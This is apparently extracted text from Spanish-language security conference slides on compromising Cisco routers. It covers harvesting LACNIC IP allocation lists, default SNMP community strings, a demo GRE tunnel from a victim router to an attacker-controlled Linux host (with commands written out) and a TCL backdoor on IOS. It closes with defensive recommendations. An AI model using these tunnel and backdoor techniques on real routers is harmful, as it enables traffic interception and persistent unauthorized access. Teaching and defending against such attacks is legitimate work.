10. Registro de Direcciones de Internet
Para América Latina y Caribe
wget ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-latest
lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocated
lacnic|BO|ipv4|186.2.0.0|16384|20090105|allocated
lacnic|PY|ipv4|186.2.192.0|8192|20100827|allocated
lacnic|EC|ipv4|186.3.64.0|16384|20091216|allocated
lacnic|EC|ipv4|186.3.128.0|32768|20100427|allocated
lacnic|CR|ipv4|186.4.0.0|16384|20091118|allocated
lacnic|AR|ipv4|186.4.64.0|16384|20100826|allocated
perl lacnic_parser.pl
14. SNMP Simple Network
Management Protocol
• Versiones: SNMPv1 - SNMPv2 - SNMPv3
• MIB: Base de Información de Administración
• Comunidad = Contraseña
- “public” = comunidad de lectura
- “private” = comunidad de escritura
32. Cisco
DEMO! interface Tunnel2
ip address 2.2.2.1 255.255.255.0
tunnel source [Publica_Linux]
tunnel destination [Publica_Cisco]
tunnel mode gre ip
Linux
modprobe ip_gre
ip tunnel add a_VICTIMA_2 mode gre remote [Publica_Cisco] local [Publica_Linux] ttl 255
ip link set a_VICTIMA_2 up
ip addr add 2.2.2.2 dev a_VICTIMA_2
ip route add 2.2.2.0/24 dev a_VICTIMA_2
35. TCL Backdoor
• Necesita “ENABLE”
• IOS 12.2(25) S, 12.3(2) T
• Funciona en otras versiones...
• “tclsh”
DEMO!
36. Recomendaciones
• Actualizar el Software
• Deshabilitar Servicios No Usados
• Bloquear el Tráfico
• Segmentar la Red de Administración
• Correlacionar Logs
@base4sec